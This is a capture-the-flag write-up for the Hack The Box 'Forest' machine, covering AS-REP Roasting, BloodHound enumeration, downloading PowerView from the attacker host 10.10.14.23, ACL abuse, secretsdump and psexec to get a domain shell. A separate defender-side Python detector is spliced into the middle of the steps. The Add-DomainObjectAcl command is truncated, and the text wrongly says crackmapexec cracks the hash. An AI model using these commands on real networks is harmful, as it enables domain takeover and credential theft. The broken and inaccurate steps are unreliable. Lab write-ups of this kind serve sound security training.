HTB Forest


https://app.hackthebox.com/machines/Forest


Enumeration


Nmap

A Domain Controller for htb.local is found.

SMB

RPC

Found a service account.

Let's test for user accounts that do not require Kerberos pre-authentication.

Create a user list with the found users.

Start up kerbrute.

Enabled user accounts that have pre-authentication disabled are vulnerable to an AS-REP Roasting attack.

Use the Impacket GetNPUsers.py from here.

Run the python script to dump out the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161

Use John to crack the hash.
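A defender-side counterpart to the AS-REP Roasting steps above, added here and not part of the original writeup: a small Python detector that flags Windows Security Event 4768 records carrying the roasting signature (no pre-authentication, RC4 ticket encryption, TGT issued). The compact key=value log rendering and the sample lines are constructed for this example.

```python
"""Flag AS-REP Roasting in Windows Security Event 4768 (TGT requested) records."""
from dataclasses import dataclass

RC4_HMAC = 0x17   # Ticket Encryption Type requested by default roasting tooling
NO_PREAUTH = 0    # Pre-Authentication Type 0 = no pre-auth performed
SUCCESS = 0x0     # Result Code 0x0 = TGT issued


@dataclass
class Event4768:
    account: str
    client_ip: str
    preauth_type: int
    enc_type: int
    result_code: int


def parse_4768(line: str) -> Event4768:
    """Parse one key=value rendering of a 4768 event (format constructed for this example)."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return Event4768(
        account=fields["TargetUserName"],
        client_ip=fields["IpAddress"].removeprefix("::ffff:"),  # strip IPv4-mapped prefix
        preauth_type=int(fields["PreAuthType"]),
        enc_type=int(fields["TicketEncryptionType"], 16),
        result_code=int(fields["Status"], 16),
    )


def is_asrep_roast(ev: Event4768) -> bool:
    """A successfully issued TGT with no pre-auth and RC4 encryption is the roasting signature."""
    return ev.result_code == SUCCESS and ev.preauth_type == NO_PREAUTH and ev.enc_type == RC4_HMAC


def detect(lines):
    """Return (account, client_ip) pairs for events matching the AS-REP Roasting signature."""
    return [(ev.account, ev.client_ip) for ev in map(parse_4768, lines) if is_asrep_roast(ev)]


# Constructed sample lines (not real Forest telemetry); IPs/account names taken from the writeup.
SAMPLE_LOG = [
    "EventID=4768 TargetUserName=svc-alfresco IpAddress=::ffff:10.10.14.23 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=persecure IpAddress=::ffff:10.10.10.161 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=nosuchuser IpAddress=::ffff:10.10.14.23 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
]

if __name__ == "__main__":
    for account, ip in detect(SAMPLE_LOG):
        print(f"possible AS-REP Roasting of {account} from {ip}")
```

Only the first sample line matches: the second is a normal pre-authenticated AES request, and the third failed (non-zero Status), so no roastable AS-REP was returned.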


Use evil-winrm to gain access.

First flag is found.

Use the BloodHound Python collector to gather JSON data for the BloodHound app.

Load the data into BloodHound and look at the svc-alfresco node.

The node belongs to the Account Operators group.

Members of the Account Operators group are allowed to create and modify users and add them to non-protected groups.

Download the PowerSploit dev-branch module from GitHub and start a Python HTTP server to transfer the PowerView script to the Windows box.

powershell Invoke-WebRequest -Uri http://10.10.14.23:80/PowerView.ps1 -OutFile PowerView.ps1

Input the following commands:

$pass = convertto-securestring 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.


Crack the hash with crackmapexec.


Use psexec.py to gain a shell.

Root flag is found.
